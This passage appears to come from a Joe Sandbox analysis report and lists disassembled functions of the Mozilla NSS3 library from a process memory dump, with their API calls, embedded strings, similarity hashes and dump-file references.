                                                                                                                                                                                                                                                      • PR_NotifyAllCondVar.NSS3 ref: 6C57FE0D
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C57FE23
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3365241057-0
                                                                                                                                                                                                                                                      • Opcode ID: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                                                      • Instruction ID: ba106c773ea658ded70a9bc6d5bc109679d3dddee0c988f447901ed13e3d7a8c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90e8ba26b482239a8eb33c561f3e3641ec10b4fbb9054642992055932be2e371
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6101A1FAA142109FDF159E55FD00C527731BB4227D7150374E82A47BE1E722ED28C6DA
                                                                                                                                                                                                                                                      Function 6C506840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506846
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: calloc.MOZGLUE(00000001,0000019C,?,6C4615C2,?,?,?,?,?,00000001,00000040), ref: 6C46178D
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(00000000,?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C506855
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C4755D0,00000000,00000000), ref: 6C4C868B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C4C86A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C4C86B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C4C86C8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C4C86E2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C4C86EC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C4C8700
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50687D
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618DE
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618F1
                                                                                                                                                                                                                                                      • PR_NewMonitor.NSS3(?,6C50AA9B,?,?,?,?,?,?,?,00000000,?,6C5080C1), ref: 6C50688C
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C4618FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C461770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C46198A
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C5068A5
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: calloc.MOZGLUE(00000001,00000084,6C460936,00000001,?,6C46102C), ref: 6C5398E5
                                                                                                                                                                                                                                                      • PR_NewLock.NSS3 ref: 6C5068B4
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C539946
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C3F16B7,00000000), ref: 6C53994E
                                                                                                                                                                                                                                                        • Part of subcall function 6C5398D0: free.MOZGLUE(00000000), ref: 6C53995E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 200661885-0
                                                                                                                                                                                                                                                      • Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                      • Instruction ID: 945f75ac4882d703893fb63a1888388a182236160d0d4d7e057436d2d442f703
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1701FBB0B01F0746E751AB764C20BE7B6E46F41299F10043E8869C6A40EF71D4488FA1
                                                                                                                                                                                                                                                      Function 6C45AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C45AFDA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C45AFC4
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C45AFD3
                                                                                                                                                                                                                                                      • unable to delete/modify collation sequence due to active statements, xrefs: 6C45AF5C
                                                                                                                                                                                                                                                      • misuse, xrefs: 6C45AFCE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                                                                      • API String ID: 632333372-924978290
                                                                                                                                                                                                                                                      • Opcode ID: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                                                      • Instruction ID: b33ea77313f702c5ac1db90167997aeb66b982713785292dd4adc0818f3df744
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056d1ea313f7f48650afc52a04701471a225e6d52d92d6c59e28280c3cdf435e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A91DE71B012158FDB04CF69C850FBEBBF1AF49315F5985A8E865AB791C331AC12CBA0
                                                                                                                                                                                                                                                      Function 6C4BFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6C4BFC55
                                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4BFCB2
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BFDB7
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4BFDDE
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8821
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: TlsGetValue.KERNEL32(?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C883D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: EnterCriticalSection.KERNEL32(?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8856
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C4C8887
                                                                                                                                                                                                                                                        • Part of subcall function 6C4C8800: PR_Unlock.NSS3(?,?,?,?,6C4D085A,00000000,?,6C478369,?), ref: 6C4C8899
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
                                                                                                                                                                                                                                                      • String ID: pkcs11:
                                                                                                                                                                                                                                                      • API String ID: 362709927-2446828420
                                                                                                                                                                                                                                                      • Opcode ID: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                                                      • Instruction ID: 04912c9921f86caf619f5ef1bd80765c3a8b0a4b2fc8465d5f5b3cd43085b1af
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57764a7d94d6ff5f2a8f4380b88dc87155d8b5c1a939a19a7c579468ee2cae0c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 805192BDB062119BFB00CE649C80F9A3779AB4135AF150029DD0E7BB51EB31F9059BB2
                                                                                                                                                                                                                                                      Function 6C3FBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcmp.VCRUNTIME140(00000000,?,?), ref: 6C3FBE02
                                                                                                                                                                                                                                                        • Part of subcall function 6C529C40: memcmp.VCRUNTIME140(?,00000000,6C3FC52B), ref: 6C529D53
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3FBE9F
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FBE89
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FBE98
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C3FBE93
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcmp$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 1135338897-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                                                      • Instruction ID: 1818aa04d2354000f43be0c5aa805b65b7193723cb6893c1758cce3f78bc5516
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 64737cf1a7c81411f29bcded457492fa96cab55db6600cad63484a4943255aff
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E73129B1A046558BC700CF69EC94AABBBA6AF6131CB094954EDA41FA41D371ED06CBE0
                                                                                                                                                                                                                                                      Function 6C4E6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E36
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4E6E57
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6E7D
                                                                                                                                                                                                                                                      • PR_MillisecondsToInterval.NSS3(?), ref: 6C4E6EAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                      • String ID: nXl
                                                                                                                                                                                                                                                      • API String ID: 3163584228-2538165799
                                                                                                                                                                                                                                                      • Opcode ID: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                                                      • Instruction ID: c49815f9abc0e5669ee95ebcb9a269d5d8330df0aa218d38ab5b255f374e71b0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0e31a45800f5b901f45e93cba575f20178abe0a87d66a7ba2592978003f25f7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2931B47261061AEADB149E38CC04FD6B7A5AB0931BF12063DD699D6BC1EB30B854CB81
                                                                                                                                                                                                                                                      Function 6C471EC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74timeCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471EE2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1820: DER_GeneralizedTimeToTime_Util.NSS3(?,?,?,6C471D97,?,?), ref: 6C4D1836
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F13
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F37
                                                                                                                                                                                                                                                      • DER_DecodeTimeChoice_Util.NSS3(?,dLGl,?,?,?,?,?,?,?,?,00000000,00000000,?,6C474C64,?,-00000004), ref: 6C471F53
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: TimeUtil$Choice_Decode$GeneralizedTime_
                                                                                                                                                                                                                                                      • String ID: dLGl
                                                                                                                                                                                                                                                      • API String ID: 3216063065-398212957
                                                                                                                                                                                                                                                      • Opcode ID: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                                                      • Instruction ID: 4678c75727577981edfe768bd4cbb2d27b52a444159335b9a39608e6206d7d3d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 033f0736f478bf7abbfb1dd6978b088b25c42a7aec4d803f6f7a145453ad6809
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E215071504256ABC750DE69DD10FDBB7E9AB88699F01092DEC48C3B40F730E659CBE2
                                                                                                                                                                                                                                                      Function 6C54A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A86D
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C417915,?,?), ref: 6C54A8A6
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C54A891
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C54A8A0
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C54A89B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                                                      • Instruction ID: 964d37d72cc7f7c7b57013de4fe14943f3d64d1cbe433db0fd695e9eb64c5d1b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 265534de6692c964d8f6495e1dd8bc7a89db153b862d0e5dc2b932c0c2ee718c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6110375A00214ABDB04CF21DC51EAEBBA1FF89314F008438FC094BA80FB34A916CBD6
                                                                                                                                                                                                                                                      Function 6C460DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C460BDE), ref: 6C460DCB
                                                                                                                                                                                                                                                      • strrchr.VCRUNTIME140(00000000,0000005C,?,6C460BDE), ref: 6C460DEA
                                                                                                                                                                                                                                                      • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C460BDE), ref: 6C460DFC
                                                                                                                                                                                                                                                      • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C460BDE), ref: 6C460E32
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • %s incr => %d (find lib), xrefs: 6C460E2D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                      • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                      • API String ID: 97259331-2309350800
